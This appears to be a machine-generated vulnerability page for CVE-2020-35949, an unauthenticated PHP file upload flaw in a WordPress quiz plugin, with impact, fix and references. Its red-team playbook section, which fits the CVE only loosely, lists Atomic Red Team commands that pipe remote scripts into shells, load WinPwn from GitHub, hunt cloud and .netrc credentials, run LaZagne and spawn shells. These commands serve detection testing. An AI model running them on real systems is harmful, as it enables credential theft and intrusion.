CVE-2020-35949
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient validation of uploaded file content types in the Quiz and Survey Master WordPress plugin. The affected component is the file upload handler for quiz questions that accept file submissions. The root cause is that only the Content-Type header is verified during file upload, allowing attackers to bypass file type restrictions by specifying a benign MIME type while uploading malicious PHP files.
Vulnerability Description
An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It made it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution. If a quiz question could be answered by uploading a file, only the Content-Type header was checked during the upload, and thus the attacker could use text/plain for a .php file.
Impact
An unauthenticated attacker can exploit this vulnerability to upload and execute arbitrary PHP code on the affected server, resulting in full remote code execution. This requires no authentication and can be performed remotely over the network. The attacker can compromise the WordPress hosting environment, potentially leading to data breaches, site defacement, or further lateral movement. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation without user interaction or privileges.
Solution
Users of the Quiz and Survey Master WordPress plugin should upgrade to version 7.0.1 or later, where this arbitrary file upload vulnerability is patched. Detailed patch instructions and advisories are available at Wordfence's official blog (https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/). No workarounds are recommended; applying the vendor-provided update is necessary to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Quiz and Survey Master plugin for WordPress stems from inadequate validation of file uploads, allowing unauthenticated users to upload arbitrary files. Specifically, the issue arises when a quiz question permits file uploads, where the only validation performed is on the Content-Type header. This oversight enables attackers to bypass security measures by uploading malicious files, such as PHP scripts, disguised as innocuous text files. The lack of thorough checks on file extensions and content poses a significant risk, as it allows for the execution of arbitrary code on the server, leading to potential remote code execution.
Attack vectors exploiting this vulnerability are relatively straightforward. An attacker could craft a quiz question that requires a file upload and then submit a PHP file while setting the Content-Type header to "text/plain." Once the file is uploaded, the server may execute the PHP code, granting the attacker control over the server environment. This exploitation could be performed without any prior authentication, making it particularly dangerous. Additionally, the ease of access to the plugin's functionality means that even individuals with minimal technical expertise could potentially execute these attacks, increasing the likelihood of exploitation in the wild.
The real-world impact of this vulnerability can be severe. Organizations utilizing the Quiz and Survey Master plugin may face significant business risks, including unauthorized access to sensitive data, defacement of websites, or even complete server compromise. The ramifications extend beyond immediate financial losses; they can also include reputational damage, loss of customer trust, and potential legal consequences stemming from data breaches. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, necessitating immediate attention from affected organizations.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, updating the Quiz and Survey Master plugin to the latest version is crucial, as it addresses the vulnerability by enhancing file upload validation mechanisms. Additionally, employing a web application firewall (WAF) can help filter out malicious requests and block potentially harmful file uploads. Regular security audits and vulnerability assessments should also be conducted to identify and remediate similar issues proactively. Furthermore, educating users and administrators about secure file upload practices can significantly reduce the risk of exploitation.
In conclusion, the vulnerability present in the Quiz and Survey Master plugin exemplifies the critical importance of robust input validation and security practices in web applications. The potential for remote code execution through improper file handling not only endangers the integrity of the affected systems but also poses a broader threat to organizational security and user trust. By adopting comprehensive detection and mitigation strategies, organizations can safeguard their assets and maintain a secure online presence.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-35949, with our telemetry indicating the reemergence of exploitation attempts after a period of dormancy. Although the EPSS score has decreased significantly, suggesting a lower overall likelihood of widespread exploitation, the sudden uptick in detection activity signals renewed interest or opportunistic targeting by threat actors. This divergence between quantitative risk metrics and qualitative detection trends underscores the need for defenders to remain vigilant, as adversaries may be testing or refining attack vectors targeting the vulnerable Quiz and Survey Master plugin. The absence of new exploit variants or public proof-of-concept code limits immediate risk amplification; however, the observed behavioral patterns suggest that exploitation attempts could increase if threat actors achieve successful footholds. Consequently, the threat level should be considered elevated relative to recent months, reflecting a dynamic threat landscape where latent vulnerabilities can rapidly regain prominence.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Expresstech | Quiz And Survey Master | All |
cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-35949 |
| wordfence.com |
GitHub CVE
x_refsource_MISC
|
https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ |
| wpscan.com |
GitHub CVE
x_refsource_MISC
|
https://wpscan.com/vulnerability/10349 |